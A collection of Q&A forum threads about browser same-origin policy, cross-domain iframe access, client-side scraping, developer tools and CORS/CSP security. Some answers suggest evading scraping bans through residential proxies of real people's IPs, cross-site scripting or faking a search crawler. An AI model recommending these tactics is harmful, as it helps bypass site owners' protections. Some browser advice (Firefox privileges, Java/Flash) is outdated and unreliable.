Elevating a browsers javascript permission? - javascript

I'm working on an internal tool, and I recall there being some way to make your script prompt for elevated permissions, and if accepted, allowing cross site requests etc...As this is an internal tool, this may accomplish something I need.
Does anyone know how to do this?
To elaborate, I'm actually trying to read (in javascript) the contents of 3rd party tracking iframes injected into our page, to give some performance analytic information. These iframes are obviously from a different domain. If I were to proxy them, they would no longer give accurate information, so that option is out.

I don't think you can actually make your script ask for elevated permission, but you can check for it and ask the user to change his browser security level if needed.
Mozilla.org has an interesting article about configurable security policies : http://www.mozilla.org/projects/security/components/ConfigPolicy.html
If you only need to bypass the same origin policy, you could use other tricks, e.g. a server-side proxy.

For Firefox/Mozilla, I think you mean netscape.security.PrivilegeManager.enablePrivilege() like in this other question.
You'll need the UniversalBrowserRead privilege to allow cross-site AJAX. (I've used it to build a set of local files for a simple stock-ticker page that grabs data from Yahoo's Finance service. The browser asks you (the user) the first time you run the browser on that page whether you want to grant the privilege. You don't have to grant it again until you restart the browser and read the same page again.)

Related

Browser-based client-side scraping

I wonder if its possible to scrape an external (cross-domain) page through the user's IP?
For a shopping comparison site, I need to scrape pages of an e-com site but several requests from the server would get me banned, so I'm looking for ways to do client-side scraping — that is, request pages from the user's IP and send to server for processing.
No, you won't be able to use the browser of your clients to scrape content from other websites using JavaScript because of a security measure called Same-origin policy.
There should be no way to circumvent this policy and that's for a good reason. Imagine you could instruct the browser of your visitors to do anything on any website. That's not something you want to happen automatically.
However, you could create a browser extension to do that. JavaScript browser extensions can be equipped with more privileges than regular JavaScript.
Adobe Flash has similar security features but I guess you could use Java (not JavaScript) to create a web-scraper that uses your user's IP address. Then again, you probably don't want to do that as Java plugins are considered insecure (and slow to load!) and not all users will even have it installed.
So now back to your problem:
I need to scrape pages of an e-com site but several requests from the server would get me banned.
If the owner of that website doesn't want you to use his service in that way, you probably shouldn't do it. Otherwise you would risk legal implications (look here for details).
If you are on the "dark side of the law" and don't care if that's illegal or not, you could use something like http://luminati.io/ to use IP adresses of real people.
Basically browsers are made to avoid doing this…
The solution everyone thinks about first:
jQuery/JavaScript: accessing contents of an iframe
But it will not work in most cases with "recent" browsers (<10 years old)
Alternatives are:
Using the official apis of the server (if any)
Try finding if the server is providing a JSONP service (good luck)
Being on the same domain, try a cross site scripting (if possible, not very ethical)
Using a trusted relay or proxy (but this will still use your own ip)
Pretends you are a google web crawler (why not, but not very reliable and no warranties about it)
Use a hack to setup the relay / proxy on the client itself I can think about java or possibly flash. (will not work on most mobile devices, slow, and flash does have its own cross site limitations too)
Ask google or another search engine for getting the content (you might have then a problem with the search engine if you abuse of it…)
Just do this job by yourself and cache the answer, this in order to unload their server and decrease the risk of being banned.
Index the site by yourself (your own web crawler), then use your own indexed website. (depends on the source changes frequency)
http://www.quora.com/How-can-I-build-a-web-crawler-from-scratch
[EDIT]
One more solution I can think about is using going through a YQL service, in this manner it is a bit like using a search engine / a public proxy as a bridge to retrieve the informations for you.
Here is a simple example to do so, In short, you get cross domain GET requests
Have a look at http://import.io, they provide a couple of crawlers, connectors and extractors. I'm not pretty sure how they get around bans but they do somehow (we are using their system over a year now with no problems).
You could build an browser extension with artoo.
http://medialab.github.io/artoo/chrome/
That would allow you to get around the same orgin policy restrictions. It is all javascript and on the client side.

Is Dipslay of service calls in browser developer tools like Firebug a security threat?

Note - It is not a duplicate of that question. The concerns are different. I don't want to disable that firebug let it be open let the user to use all functionality provided by firebug, I only want firebug not to show service calls.
I may be wrong but I want to ask when browser developer tools like firebug displays service calls and their request response Is it not a security threat? If not why so?
IF it is, Is there any way by which we can hide the display of service calls after build deployment in firebug or developer tools?
You can see a get request shown by firebug in Mozilla firefox.
I have searched for this but not getting anything fruitful and I am also not able to find any post related to this concern on stackoverflow. If any one has any information please share it.
No, this is not a security issue on any properly designed web site / service. The browser, and requests performed by the browser, should all be considered to be under the user's control. (Indeed, from a security perspective, the browser should be considered an extension of the user, rather than something separate from them.) As such, the user viewing something that's under the user's control is not a risk at all.
If your web site is sending data that the user shouldn't be allowed to see in HTTP(S) requests, you've done something wrong. That data should never leave the server at all if it's that sensitive - move the logic that needs it off of the client (e.g, Javascript) and back onto the server side.
If your web application follows security through obscurity then it would be harmful.
But as long as you make your web application secure with common vulnerabilities like CSRF, XSS taken care of then anyone seeing the request made / response received doesn't matter.

Are there any clear limits of JavaScript in relation to manipulating the browser and DOM?

I heard that getting access to the text a Gmail email is very difficult if not impossible (iframes).
Are there certain areas where JavaScript is not capable of doing something?
iframes won't prevent you from accessing content. JavaScript doesn't really have any limits with regards to manipulating the DOM....it can't, however, access stuff on your computer, or be used to upload files and such. It can't read stuff inside flash files either. You don't really have any choices other than JS anyway.. what kind of road blocks are you anticipating?
Since you've chosen to use firefox-addon tag: no, getting access to Gmail text is unproblematic from an add-on. Doing the same from a regular website however isn't possible unless that website is hosted on mail.google.com. Reason is a security mechanism called same-origin policy. Websites are generally limited by the same-origin policy, add-ons are not.
Different browsers have different limitations that they impose on JavaScript as well as different APIs that they provide to JavaScript to grant it access to different forms of data. Until recently, it was not possible for JavaScript to access local files; however, there are now APIs in some browsers to do this.
There is a concept known as the "same origin" policy that is used to ensure that JavaScript running from the context of one domain or protocol cannot access data from another domain or protocol. However, browser add-ons or extensions can often exempt themselves from these restrictions. Also, some browsers provide APIs specifically for communication between different origins; however, these APIs generally require that this is done with the cooperation and permission of both origins.
From extension JS, you can access any part of Gmail. I wrote a browser extension that allowed me to forward a Gmail email to a Facebook contact. It also appeared in Facebook and allowed me to send Facebook message to Gmail contact. It was so that I didn't need to worry about adding contacts from Google to Facebook and vice versa.
That extension was easy. Once you get passed the iframe piece, it is cake. Good luck!

grant access to Location to framed external site

I'm iframing an external site. That site tries to call location from parent for analytics reasons and access is refused (for obvious default security reasons) .
Yet I would like to disable that security and answer, because that site is a 'friend' but not on the same domain.
Seems impossible to grant that access... any idea ?
I ran into a similar situation before. Allowing for cross domain javascript access through iframes is not possible since this would result in a cross-scripting-attack nightmare. Like the other poster said, you will have to post this data to them yourself. One way to fix this is to set a cookie that can be read by the other domain with whatever information they are looking for then they can read the data from the cookie. Javascript can set to the cookie when you load the other site in the iframe. For a function to do that, check http://phpjs.org/functions/setcookie:509
If the site is a 'friend' as you say - how about passing them the location data yourself?

Cross-Origin Resource Sharing (CORS) - am I missing something here?

I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making a stricter cross domain policy on other tags (script/image) while being more secure, would break a lot of existing code, and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure its an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
The problem isn't that a site can access another sites resources that it already had access to. The problem is one of domain -- If I'm using a browser at my company, and an ajax script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution -- CORS. I'm not saying its the best, but is solves this issue.
1) If the gateway can't return back the 'bobthehacker.com' accepted origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the SIMPLE CORS case, it will actually still return the results. By default; you can configure the server to not even do that. Then the results are discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over the headers that are accepted and rejected to make the request from those sites conform to a certain shape.
Note -- the ORIGIN and OPTIONS headers are controlled by the requester -- obviously someone creating their own HTTP request can put whatever they want in there. However a modern CORS compliant browser WONT do that. It is the Browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
I share David's concerns.
Security must be built layer by layer and a white list served by the origin server seems to be a good approach.
Plus, this white list can be used to close existing loopholes (forms, script tag, etc...), it's safe to assume that a server serving the white list is designed to avoid back compatibility issues.

Categories